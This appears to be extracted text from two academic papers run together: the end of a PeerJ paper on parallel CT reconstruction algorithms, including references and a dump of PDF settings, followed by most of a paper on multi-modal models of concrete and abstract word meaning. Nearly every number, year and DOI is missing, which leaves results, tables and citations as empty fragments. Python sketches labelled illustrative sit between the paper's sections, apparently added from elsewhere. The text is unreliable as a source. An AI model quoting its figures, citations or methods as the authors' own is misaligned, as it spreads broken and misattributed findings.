blocks increases, the number of iterations increases, and the increase is approximately . the number of iterations for one thread (this is shown in fig. , but for other cases it is similar). the application of bigger number of threads reduces significantly the time needed to execute the iterations. in the initial phase, increasing the number of threads reduces the execution time of , iterations. on average, the execution time for , iterations on n threads is approximately . % of the execution time for , iterations on n − threads. then (from threads) this percentage drops significantly (the reason is a much smaller amount of information that individual blocks have). in future there are planned the further tests for optimizing the reconstruction parameters in order to develop the biggest possible advantage of pb algorithm, and other algorithms using the parallel calculations, over the sequential algorithm. the current paper gives the basis for this planned research. additional information and declarations funding the author received no funding for this work. . . . . . . . . . . figure execution time , iterations (iter.) depending on the number of blocks, n = , m = , λ = , f (x,y). full-size doi: . /peerj-cs. /fig- pleszczyński ( ), peerj comput. sci., doi . 
/peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ competing interests the author declares that they have no competing interests. author contributions � mariusz pleszczyński conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the program codes are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references andersen a. . algebraic reconstruction in ct from limited views. ieee transactions in medical imaging ( ): – doi . / . . andersen a, kak a. . simultaneous algebraic reconstruction technique (sart): a superior implementation of the art algorithm. ultrasonic imaging ( ): – doi . / . averbuch a, shkolnisky y. . d fourier based discrete radon transform. applied and computational harmonic analysis ( ): – doi . /s - ( ) - . censor y, elfving t, herman g, nikazad t. . on diagonally relaxed orthogonal projection methods. siam journal on scientific computing ( ): – doi . / . cozzolino m, gentile v, mauriello p, peditrou a. . non-destructive techniques for building evaluation in urban areas: the case study of the redesigning project of eleftheria square (nicosia, cyprus). applied sciences ( ): doi . /app . donegani m, ferrarazzo g, marra s, miceli a, raffa s, bauckneht m, morbelli s. . positron emission tomography-based response to target and immunotherapies in oncology. medicina ( ): doi . /medicina . drummond l, duff i, guivarch r, ruiz d, zenadi m. . partitioning strategies for the block cimmino algorithm. journal of engineering mathematics ( ): – doi . /s - - - . elfving t, nikazad t. . properties of a class of block-iterative methods. inverse problems ( ): doi . / - / / / . gilbert p. . iterative methods for the three-dimensional reconstruction of an object from projections. journal of theoretical biology ( ): – doi . / - ( ) - . gong l, nie l, xu y. . geometrical and topological analysis of pore space in sandstones based on x-ray computed tomography. energies ( ): doi . /en . gordon d, gordon r. . component-averaged row projections: a robust, block-parallel scheme for sparse linear systems. siam journal on scientific computing ( ): – doi . / . pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / http://dx.doi.org/ . /app http://dx.doi.org/ . /medicina http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - / / / http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /en http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gordon r, bender r, herman g. . algebraic reconstruction techniques (art) for three- dimensional electron microscopy and x-ray photography. journal of theoretical biology ( ): – doi . / - ( ) - . guan h, gordon r. . computed tomography using algebraic reconstruction techniques with different projection access schemes: a comparison study under practical situation. physics in medicine and biology ( ): – doi . 
/ - / / / . herman g. . a relaxation method for reconstructing objects from noisy x-rays. mathematical programming ( ): – doi . /bf . hetmaniok e, ludew j, pleszczyński m. . examination of stability of the computer tomography algorithms in case of the incomplete information for the objects with non- transparent elements. in: wituła r, bajorska-harapińska b, hetmaniok e, słota d, trawiński t, eds. selected problems on experimental mathematics. gliwice: silesian university of technology press, – . hounsfield g. . a method of and apparatus for examination of a body by radiation such as x- ray or gamma radiation. patent specification . the patent office. jiang m, wang g. . convergence studies on iterative algorithms for image reconstruction. ieee transactions on medical imaging ( ): – doi . /tmi. . . kaczmarz s. . angenäherte auflösung von systemen lineare gleichungen. international academy of political science letter : – . kamath g, shi l, song w-z, lees j. . distributed travel-time seismic tomography in large-scale sensor networks. journal of parallel and distributed computing ( – ): – doi . /j.jpdc. . . . lewitt r. . reconstruction algorithms: transform methods. proceedings of the ieee ( ): – doi . /proc. . . louis a. a. nonuniqueness in inverse radon problems: the frequency distribution of the ghosts. mathematische zeitschrift ( ): – doi . /bf . louis a. b. orthogonal function series expansions and the null space of the radon transform. siam journal of mathematical analysis ( ): – doi . / . malczewski k. . image resolution enhancement of highly compressively sensed ct/pet signals. algorithms ( ): doi . /a . natterer f. . the mathematics of computerized tomography. hoboken: wiley. radon j. . Über die bestimmung von funktionen durch ihre integalwerte längs gewisser mannigfaltigkeiten. berichte sächsische akademie der wissenschaften : – . sørensen h, hansen p. . multicore performance of block algebraic iterative reconstruction methods. siam journal on scientific computing ( ): – doi . / . tanabe k. . projection method for solving a singular system of linear equations and its applications. numerische mathematik ( ): – doi . /bf . torun f, manguoglu m, aykanat c. . a novel partitioning method for accelerating the block cimmino algorithm. siam journal on scientific computing ( ): – doi . / m . trummer m. . a note on the art of relaxation. computing ( – ): – doi . /bf . verhoeven d. . multiplicative algebraic computed tomography algorithms for the reconstruction of multidirectional interferometric data. optical engineering ( ): – doi . / . . pleszczyński ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /bf http://dx.doi.org/ . /tmi. . http://dx.doi.org/ . /j.jpdc. . . http://dx.doi.org/ . /proc. . http://dx.doi.org/ . /bf http://dx.doi.org/ . / http://dx.doi.org/ . /a http://dx.doi.org/ . / http://dx.doi.org/ . /bf http://dx.doi.org/ . / m http://dx.doi.org/ . /bf http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ waldén j. . analysis of the direct fourier method for computer tomography. ieee transactions in medical imaging ( ): – doi . / . . yao y, liu c, xu c. . a new gnss-derived water vapor tomography method based on optimized voxel for large gnss network. remote sens ( ): doi . /rs . zhang z, sameh a. . block row projection method based on m-matrix splitting. journal of computational and applied mathematics ( ): – doi . /j.cam. . . . pleszczyński ( ), peerj comput. 
sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . /rs http://dx.doi.org/ . /j.cam. . . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. implementation of the computer tomography parallel algorithms with the incomplete set of data introduction conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . 
multi-modal models for concrete and abstract concept meaning

felix hill, computer laboratory, university of cambridge, fh @cam.ac.uk
roi reichart, technion - iit, haifa, israel, roiri@ie.technion.ac.il
anna korhonen, computer laboratory, university of cambridge, alk @cam.ac.uk

abstract
multi-modal models that learn semantic representations from both linguistic and perceptual input outperform language-only models on a range of evaluations, and better reflect human concept acquisition. most perceptual input to such models corresponds to concrete noun concepts and the superiority of the multi-modal approach has only been established when evaluating on such concepts. we therefore investigate which concepts can be effectively learned by multi-modal models. we show that concreteness determines both which linguistic features are most informative and the impact of perceptual input in such models. we then introduce ridge regression as a means of propagating perceptual information from concrete nouns to more abstract concepts that is more robust than previous approaches. finally, we present weighted gram matrix combination, a means of combining representations from distinct modalities that outperforms alternatives when both modalities are sufficiently rich.

introduction
what information is needed to learn the meaning of a word? children learning words are exposed to a diverse mix of information sources. these include clues in the language itself, such as nearby words or speaker intention, but also what the child perceives about the world around it when the word is heard. learning the meaning of words requires not only a sensitivity to both linguistic and perceptual input, but also the ability to process and combine information from these modalities in a productive way.

many computational semantic models represent words as real-valued vectors, encoding their relative frequency of occurrence in particular forms and contexts in linguistic corpora (sahlgren, ; turney et al., ). motivated both by parallels with human language acquisition and by evidence that many word meanings are grounded in the perceptual system (barsalou et al., ), recent research has explored the integration into text-based models of input that approximates the visual or other sensory modalities (silberer and lapata, ; bruni et al., ). such models can learn higher-quality semantic representations than conventional corpus-only models, as evidenced by a range of evaluations. however, the majority of perceptual input for the models in these studies corresponds directly to concrete noun concepts, such as chocolate or cheeseburger, and the superiority of the multi-modal over the corpus-only approach has only been established when evaluations include such concepts (leong and mihalcea, ; bruni et al., ; roller and schulte im walde, ; silberer and lapata, ). it is thus unclear if the multi-modal approach is effective for more abstract words, such as guilt or obesity. indeed, since empirical evidence indicates differences in the representational frameworks of both concrete and abstract concepts (paivio, ; hill et al., ), and verb and noun concepts (markman and wisniewski, ), perceptual information may not fulfill the same role in the representation of the various concept types. this potential challenge to the multi-modal approach is of particular practical importance since concrete nouns constitute only a small proportion of the open-class, meaning-bearing words in everyday language (as discussed below).
in light of these considerations, this paper addresses three questions: (1) which information sources (modalities) are important for acquiring concepts of different types? (2) can perceptual input be propagated effectively from concrete to more abstract words? (3) what is the best way to combine information from the different sources?

we construct models that acquire semantic representations for four sets of concepts: concrete nouns, abstract nouns, concrete verbs and abstract verbs. the linguistic input to the models comes from the recently released google syntactic n-grams corpus (goldberg and orwant, ), from which a selection of linguistic features are extracted. perceptual input is approximated by data from the mcrae et al. ( ) norms, which encode perceptual properties of concrete nouns, and the espgame dataset (von ahn and dabbish, ), which contains manually generated descriptions of images.

to address (1) we extract representations for each concept type from combinations of information sources. we first focus on different classes of linguistic features, before extending our models to the multi-modal context. while linguistic information overall effectively reflects the meaning of all concept types, we show that features encoding syntactic patterns are only valuable for the acquisition of abstract concepts. on the other hand, perceptual information, whether directly encoded or propagated through the model, plays a more important role in the representation of concrete concepts.

in addressing (2), we propose ridge regression (myers, ) as a means of propagating features from concrete nouns to more abstract concepts. the regularization term in ridge regression encourages solutions that generalize well across concept types. we show that ridge regression effectively propagates perceptual information to abstract nouns and concrete verbs, and is overall preferable to both linear regression and the method of johns and jones ( ) applied to a similar task by silberer and lapata ( ). however, for all propagation methods, the impact of integrating perceptual information depends on the concreteness of the target concepts. indeed, for abstract verbs, the most abstract concept type in our evaluations, perceptual input actually degrades representation quality. this highlights the need to consider the concreteness of the target domain when constructing multi-modal models.

to address (3), we present various means of combining information from different modalities. we propose weighted gram matrix combination, a technique in which representations of distinct modalities are mapped to a space of common dimension where coordinates reflect proximity to other concepts. this transformation, which has been shown to enhance semantic representations in the context of verb clustering (reichart and korhonen, ), reduces representation sparsity and facilitates a product-based combination that results in greater inter-modal dependency. weighted gram matrix combination outperforms alternatives such as concatenation and canonical correlation analysis (cca) (hardoon et al., ) when combining representations from two similarly rich information sources.

in the sections that follow, we present experiments with linguistic features designed to address question (1); these analyses are then extended to multi-modal models, where we also address (2) and (3). we first discuss the relevance of concreteness and part-of-speech (lexical function) to concept representation.
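as a rough, self-contained sketch of the ridge-regression propagation idea referred to in question (2) above: a linear map from linguistic vectors to perceptual feature vectors is fit on concrete nouns (for which perceptual features exist) and then applied to words that lack perceptual input. the dimensions, the regularization strength and the closed-form fitting step below are illustrative assumptions, not details taken from the paper.

```python
# ridge-regression propagation of perceptual features from concrete nouns to other words.
import numpy as np

def fit_ridge(L_concrete, P_concrete, alpha=1.0):
    """closed-form ridge solution W minimizing ||L W - P||^2 + alpha ||W||^2."""
    d = L_concrete.shape[1]
    W = np.linalg.solve(L_concrete.T @ L_concrete + alpha * np.eye(d),
                        L_concrete.T @ P_concrete)
    return W

def propagate(L_target, W):
    """predict (pseudo-)perceptual vectors for words that have no perceptual input."""
    return L_target @ W

# toy shapes: concrete nouns with linguistic and perceptual vectors, abstract words with linguistic only
rng = np.random.default_rng(0)
L_concrete = rng.normal(size=(50, 300))
P_concrete = rng.normal(size=(50, 20))
L_abstract = rng.normal(size=(30, 300))
P_abstract_predicted = propagate(L_abstract, fit_ridge(L_concrete, P_concrete, alpha=10.0))
```

the penalty on the weights is what distinguishes this from plain linear regression: it discourages the mapping from overfitting the concrete-noun training set, which is one reading of why such a regularized map might transfer better to other concept types.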
concreteness and word meaning

a large and growing body of psychological evidence indicates differences between abstract and concrete concepts. it has been shown that concrete words are more easily learned, remembered and processed than abstract words (paivio, ; schwanenflugel and shoben, ), while neuroimaging studies demonstrate differences in brain activity when subjects are presented with stimuli corresponding to the two concept types (binder et al., ).

the abstract/concrete distinction is important to computational semantics for various reasons. while many models construct representations of concrete words (andrews et al., ; landauer and dumais, ), abstract words are in fact far more common in everyday language. for instance, based on an analysis of those noun concepts in the university of south florida dataset (usf) and their occurrence in the british national corpus (bnc) (leech et al., ), % of noun tokens in corpora are rated by human judges as more abstract than the noun war, a concept that many would already consider quite abstract. (here concreteness is understood intuitively, as per the psychological literature (rosen, ; gallese and lakoff, ); this sample covers . % of all noun tokens in the bnc.)

figure : boxplot of concreteness distributions for noun and verb concepts in the usf data, with selected example concepts (mood, praise, beam, clam, sardine, penguin; look, stab, rule, enjoy, leave, swing, believe) plotted along an average concreteness rating axis. the bold vertical line is the mean, boxes extend from the first to the third quartile, and dots represent outliers.

the recent interest in multi-modal semantics further motivates a principled modelling approach to lexical concreteness. many multi-modal models implicitly distinguish concrete and abstract concepts since their perceptual input corresponds only to concrete words (bruni et al., ; silberer and lapata, ; roller and schulte im walde, ). however, given that many abstract concepts express relations or modifications of concrete concepts (gentner and markman, ), it is reasonable to expect that perceptual information about concrete concepts could also enhance the quality of more abstract representations in an appropriately constructed model.

moreover, concreteness is closely related to more functional lexical distinctions, such as those between adjectives, nouns and verbs. an analysis of the usf dataset, which includes concreteness ratings for over , words collected from thousands of participants, indicates that on average verbs (mean concreteness, . ) are considered more abstract than nouns (mean concreteness, . ), an effect illustrated in figure . this connection between lexical function and concreteness suggests that a sensitivity to concreteness could improve models that already make principled distinctions between words based on their part-of-speech (pos) (im walde, ; baroni and zamparelli, ).

although the focus of this paper is on multi-modal models, few conventional semantic models make principled distinctions between concepts based on function or concreteness. before turning to the multi-modal case, we thus investigate whether these distinctions are pertinent to text-only models.

concreteness and linguistic features

it has long been known that aspects of word meaning can be inferred from nearby words in corpora. approaches that exploit this fact are often called distributional models (sahlgren, ; turney et al., ). we take a distributional approach to learning linguistic representations.
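the lexical features described below are pmi-weighted co-occurrence counts; as a purely illustrative sketch of how such a vector could be computed (the sentence-window counting, the window size and all names here are assumptions, not the authors' pipeline, which draws counts from the google syntactic n-grams corpus):

```python
# illustrative pmi-weighted co-occurrence vector for one target word.
# the corpus format (token lists) and window=5 are assumptions for the sketch.
import math
from collections import Counter

def pmi_vector(target, concepts, sentences, window=5):
    """sentences: iterable of token lists. returns {concept: pmi(target, concept)}."""
    word_counts = Counter()
    pair_counts = Counter()
    total = 0
    for tokens in sentences:
        word_counts.update(tokens)
        total += len(tokens)
        for i, w in enumerate(tokens):
            if w != target:
                continue
            for c in tokens[max(0, i - window): i + window + 1]:
                if c in concepts and c != target:
                    pair_counts[c] += 1
    vec = {}
    for c in concepts:
        if pair_counts[c] and word_counts[target] and word_counts[c]:
            p_pair = pair_counts[c] / total
            p_t, p_c = word_counts[target] / total, word_counts[c] / total
            vec[c] = math.log(p_pair / (p_t * p_c))  # pointwise mutual information
    return vec
```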
the advantage of using distributional methods to learn representations from corpora versus approaches that rely on knowledge bases (pedersen et al., ; leong and mihalcea, ) is that they are more scalable, easily applicable across languages and plausibly reflect the process of human word learning (landauer and dumais, ; griffiths et al., ). we group distributional features into three classes to test which forms of linguistic information are most pertinent to the abstract/concrete and verb/noun distinctions. all features are extracted from the google syntactic n-grams corpus. the dataset contains counted dependency-tree fragments for over bn words of the english google books corpus.

. feature classes

lexical features our lexical features are the co-occurrence counts of a concept word with each of the other , concepts in the usf data. co-occurrences are counted in a -word window, and, as elsewhere (erk and padó, ), weighted by pointwise mutual information (pmi) to control for the underlying frequency of both concept and word.

pos-tag features many words function as more than one pos, and this variation can be indicative of meaning (manning, ). for example, deverbal nouns, such as shiver or walk, often refer to processes rather than entities. to capture such effects, we count the frequency of occurrence with the pos categories adjective, adverb, noun and verb.

grammatical features grammatical role is a strong predictor of semantics (gildea and jurafsky, ). for instance, the subject of transitive verbs is more likely to refer to an animate entity than a noun chosen at random. syntactic context also predicts verb semantics (kipper et al., ). we thus count the frequency of nouns in a range of (non-lexicalized) syntactic contexts, and of verbs in one of the six most common subcategorization-frame classes as defined in van de cruys et al. ( ). these contexts are detailed in table .

  noun concepts:
    indirect object      gave it to the man
    direct object        gave the pie to him
    subject              the man grinned
    in pp                was in his mouth
    adject. modifier     the portly man
    infinitive clause    to eat is human
  verb concepts:
    transitive           he bit the steak
    intransitive         he salivated
    ditransitive         put jam on the toast
    phrasal verb         he gobbled it up
    infinitival comp.    he wants to snooze
    clausal comp.        i bet he won't diet
table : grammatical features for noun/verb concepts

. evaluation sets

we create evaluation sets of abstract and concrete concepts, and introduce a complementary dichotomy between nouns and verbs, the two pos categories most fundamental to propositional meaning. to construct these sets, we extract nouns and verbs from word pairs in the usf data based on their majority pos-tag in the lemmatized bnc (leech et al., ), excluding any word not assigned to either of the pos categories in more than % of instances. from the resulting nouns and verbs, the abstract-concrete distinction is drawn by ordering words according to concreteness and sampling at random from the first and fourth quartiles. any concrete nouns not occurring in the mcrae et al. ( ) property norm dataset were also excluded.

  concept type      words   pairs   examples
  concrete nouns                    yacht, cup
  abstract nouns                    fear, respect
  all nouns                         cup, respect
  concrete verbs                    kiss, launch
  abstract verbs                    differ, obey
  all verbs                         kiss, differ
table : evaluation sets used throughout. all nouns and all verbs are the union of abstract and concrete subsets and mixed abstract-concrete or concrete-abstract pairs.
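as a rough sketch of the evaluation-set construction just described (the input layout and the majority threshold are illustrative assumptions, and the random sampling within quartiles is omitted here):

```python
# illustrative construction of abstract/concrete noun and verb evaluation sets.
# pos_counts, concreteness layouts and the 0.7 majority threshold are assumptions.

def build_sets(words, pos_counts, concreteness, majority=0.7):
    """words: candidate word strings.
    pos_counts: dict word -> {pos: count} from a pos-tagged corpus.
    concreteness: dict word -> mean human concreteness rating."""
    by_pos = {"noun": [], "verb": []}
    for w in words:
        counts = pos_counts.get(w, {})
        total = sum(counts.values())
        for pos in by_pos:
            if total and counts.get(pos, 0) / total > majority:
                by_pos[pos].append(w)
    sets = {}
    for pos, ws in by_pos.items():
        ranked = sorted(ws, key=lambda w: concreteness[w])
        q = len(ranked) // 4
        sets["abstract " + pos + "s"] = ranked[:q]   # first (least concrete) quartile
        sets["concrete " + pos + "s"] = ranked[-q:]  # fourth (most concrete) quartile
    return sets
```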
for each list of concepts l = concrete nouns, concrete verbs, abstract nouns, abstract verbs, together with lists all nouns and all verbs, a corresponding set of pairs $\{(w_1, w_2) \in \text{usf} : w_1, w_2 \in l\}$ is defined for evaluation. these details are summarized in table . evaluation lists, sets of pairs and usf scores are downloadable from our website.

. evaluation methodology

all models are evaluated by measuring correlations with the free-association scores in the usf dataset (nelson et al., ). this dataset contains the free-association strength of over , word pairs. these data reflect the cognitive proximity of concepts and have been widely used in nlp as a gold-standard for computational models (andrews et al., ; feng and lapata, ; silberer and lapata, ; roller and schulte im walde, ).

for evaluation pairs $(c_1, c_2)$ we calculate the cosine similarity between our learned feature representations for $c_1$ and $c_2$, a standard measure of the proximity of two vectors (turney et al., ), and follow previous studies (leong and mihalcea, ; huang et al., ) in using spearman's ρ as a measure of correlation between these values and our gold-standard. all representations in this section are combined by concatenation, since the present focus is not on combination methods.

  feature type     all nouns   conc. nouns   abs. nouns   all verbs   conc. verbs   abs. verbs
  ( ) lexical
  ( ) pos-tag
  ( ) grammatical
  ( )+( )+( )
table : spearman correlation ρ of cosine similarity between vector representations derived from three feature classes with usf scores. * indicates statistically significant correlations (p < . ).

. results

the performance of each feature class on the evaluation sets is detailed in table . when all linguistic features are included, performance is somewhat better on noun concepts (ρ = . ) than verbs (ρ = . ). however, while correlations are significant on concrete (ρ = . ) and abstract nouns (ρ = . ) and concrete verbs, the effect is not significant on abstract verbs (although it is on verbs overall). the highest correlations for the linguistic features together are on abstract nouns (ρ = . ) and concrete verbs (ρ = . ). referring back to the continuum in figure , it is possible that there is an optimum concreteness level, exhibited by abstract nouns and concrete verbs, at which conceptual meaning is best captured by linguistic models.

the results indicate that the three feature classes convey distinct information. it is perhaps unsurprising that lexical features produce the best performance in the majority of cases; the value of lexical co-occurrence statistics in conveying word meaning is expressed in the well known distributional hypothesis (harris, ). more interestingly, on abstract concepts the contribution of pos-tag (nouns, ρ = . ; verbs, ρ = . ) and grammatical features (nouns, ρ = . ; verbs, ρ = . ) is notably higher than on the corresponding concrete concepts.

free-association strength is measured by presenting subjects with a cue word and asking them to produce the first word they can think of that is associated with that cue word. we consider spearman's ρ, a non-parametric ranking correlation, to be more appropriate than pearson's r for free association data, which is naturally skewed and non-continuous. when combining multiple representations we normalize
the importance of such features to modelling free-association between abstract concepts suggests that they may convey information about how con- cepts are (subjectively) organized and interrelated in the minds of language users, independent of their realisation in the physical world. indeed, since ab- stract representations rely to a lesser extent than con- crete representations on perceptual input (section ), it is perhaps unsurprising that more of their meaning is reflected in subtle linguistic patterns. the results in this section demonstrate that differ- each representation, then concatenate and then renormalize. ent information is required to learn representations for abstract and concrete concepts and for noun and verb concepts. in the next section, we investigate how perceptual information fits into this equation. acquiring multi-modal representations as noted in section , there is experimental evi- dence that perceptual information plays a distinct role in the representation of different concept types. we explore whether this finding extends to com- putational models by integrating such information into our corpus-based approaches. we focus on two aspects of the integration process. propaga- tion: can models infer useful information about ab- stract nouns and verbs from perceptual information corresponding to concrete nouns? and combina- tion: how can linguistic and (propagated or actual) perceptual information be integrated into a single, multi-modal representation? we begin by introduc- ing the two sources of perceptual information. . perceptual information sources the mcrae dataset the mcrae et al. ( ) property norms dataset is commonly used as a per- ceptual information source in cognitively-motivated semantic models (kelly et al., ; roller and schulte im walde, ). the dataset contains prop- erties of over concrete noun concepts produced by human annotators. the proportion of sub- jects producing each property gives a measure of the strength of that property for a given concept. we en- code this data in vectors with coordinates for each of the , properties in the dataset. a concept rep- resentation contains (real-valued) feature strengths in places corresponding to the features of that con- cept and zeros elsewhere. having defined the con- crete noun evaluation set as the concepts found in both the usf and mcrae datasets, this informa- tion is available for all concrete nouns. the esp-game dataset to complement the cognitively-driven mcrae data with a more explic- itly visual information source, we also extract infor- mation from the esp-game dataset (von ahn and dabbish, ) of , photographs, each an- notated with a list of entities depicted in that im- age. this input enables connections to be made be- tween concepts that co-occur in scenes, and thus might be experienced together by language learn- ers at a given time. because we want our models to reflect human concept learning in inferring con- ceptual knowledge from comparatively unstructured data, we use the esp-game dataset in preference to resources such as imagenet (deng et al., ), in which the conceptual hierarchy is directly encoded by expert annotators. an additional motivation is that esp-game was produced by crowdsourcing a simple task with untrained annotators, and thus rep- resents a more scalable class of data source. we represent the esp-game data in , di- mensional vectors, with co-ordinates corresponding to each image in the dataset. 
a concept representation contains a 1 in any place that corresponds to an image in which the concept appears, and a 0 otherwise. although it is possible to portray actions and processes in static images, and several of the esp-game images are annotated with verb concepts, for a cleaner analysis of the information propagation process we only include esp input in our models for the concrete nouns in the evaluation set.

the data encoding outlined above results in perceptual representations of dimension ≈ , , for which, on average, fewer than . % of entries are non-zero (the esp-game and mcrae representations are of approximately equal sparsity). in contrast, in our full linguistic representations of nouns (dimension ≈ , ) and verbs (dimension ≈ , ) (section ), an average of % of entries are non-zero. one of the challenges for the propagation and combination methods described in the following subsections is therefore to manage the differences in dimension and sparsity between linguistic and perceptual representations.

. information propagation

johns and jones silberer and lapata ( ) apply a method designed by johns and jones ( ) to infer quasi-perceptual representations for a concept in the case that actual perceptual information is not available. translating their approach to the present context, for verbs and abstract nouns we infer quasi-perceptual representations based on the perceptual features of concrete nouns that are nearby in the semantic space defined by the linguistic features.

in the first step of their two-step method, for each abstract noun or verb k, a quasi-perceptual representation is computed as an average of the perceptual representations of the concrete nouns, weighted by the proximity between these nouns and k:

\[ k_p = \sum_{c \in \bar{c}} s(k_l, c_l)^{\lambda} \cdot c_p \]

where $\bar{c}$ is the set of concrete nouns, $c_p$ and $k_p$ are the perceptual representations for c and k respectively, and $c_l$ and $k_l$ the linguistic representations. the exponent parameter λ reflects the learning rate. following johns and jones ( ), we define the proximity function s between noun concepts to be cosine similarity. however, because our verb and noun representations are of different dimension, we take verb-noun proximity to be the pmi between the two words in the corpus, with co-occurrences counted within a -word window.

in step two, the initial quasi-perceptual representations are inferred for a second time, but with the weighted average calculated over the perceptual or initial quasi-perceptual representations of all other words, not just concrete nouns. as with johns and jones ( ), we set the learning rate parameter λ to be in the first step and in the second.

ridge regression as an alternative propagation method we propose ridge regression (myers, ). ridge regression is a variant of least squares regression in which a regularization term is added to the training objective to favor solutions with certain properties. here we apply it to learn parameters for linear maps from linguistic representations of concrete nouns to features in their perceptual representations. for concepts with perceptual representations of dimension $n_p$, we learn $n_p$ linear functions $f_i : \mathbb{R}^{n_l} \to \mathbb{R}$ that map the linguistic representations (of dimension $n_l$) to a particular perceptual feature i. these functions are then applied together to map the linguistic representations of abstract nouns and verbs to full quasi-perceptual representations.
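a minimal sketch of the first propagation step defined above, assuming dictionary containers for the vectors and an illustrative value for the learning rate λ (the published values are not reproduced here):

```python
# illustrative johns-and-jones step one: quasi-perceptual vector for an abstract
# noun or verb k as a proximity-weighted average of concrete-noun perceptual vectors.
import numpy as np

def cosine(u, v):
    return float(np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v)))

def propagate_jj(k_linguistic, concrete_nouns, linguistic, perceptual, lam=3):
    """concrete_nouns: list of words; linguistic/perceptual: dict word -> np.array;
    lam is an illustrative learning-rate exponent, not the paper's setting."""
    quasi = np.zeros_like(perceptual[concrete_nouns[0]])
    for c in concrete_nouns:
        weight = cosine(k_linguistic, linguistic[c]) ** lam
        quasi += weight * perceptual[c]
    return quasi
```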
as our model is trained on concrete nouns but applied to other concept types, we do not wish the mapping to reflect the training data too faithfully. to mitigate against this we define our regularization term as the euclidean l2 norm of the inferred parameter vector. this term ensures that the regression favors lower coefficients and a smoother solution function, which should provide better generalization performance than simple linear regression. the objective for learning the $f_i$ is then to minimize

\[ \| a x - y_i \|^2 + \| a \|^2 \]

where a is the vector of regression coefficients, x is a matrix of linguistic representations and $y_i$ a vector of perceptual feature i for the set of concrete nouns. (because the pos-tag and grammatical features are different for nouns and for verbs, we exclude them from our linguistic representations when implementing ridge regression.)

we now investigate ways in which the (quasi-) perceptual representations acquired via these methods can be combined with linguistic representations.

. information combination

canonical correlation analysis canonical correlation analysis (cca) (hardoon et al., ) is an established statistical method for exploring relationships between two sets of random variables. the method determines a linear transformation of the space spanned by each of the sets of variables, such that the correlations between the sets of transformed variables is maximized.

silberer and lapata ( ) apply cca in the present context of information fusion, with one set of random variables corresponding to perceptual features and another corresponding to linguistic features. applied in this way, cca provides a mechanism for reducing the dimensionality of the linguistic and perceptual representations such that the important interactions between them are preserved (dimensionality reduction is desirable in the present context because of the sparsity of our perceptual representations). the transformed linguistic and perceptual vectors are then concatenated. we follow silberer and lapata by applying a kernelized variant of cca (the kernelcca package in python: http://pythonhosted.org/apgl/kernelcca.html).

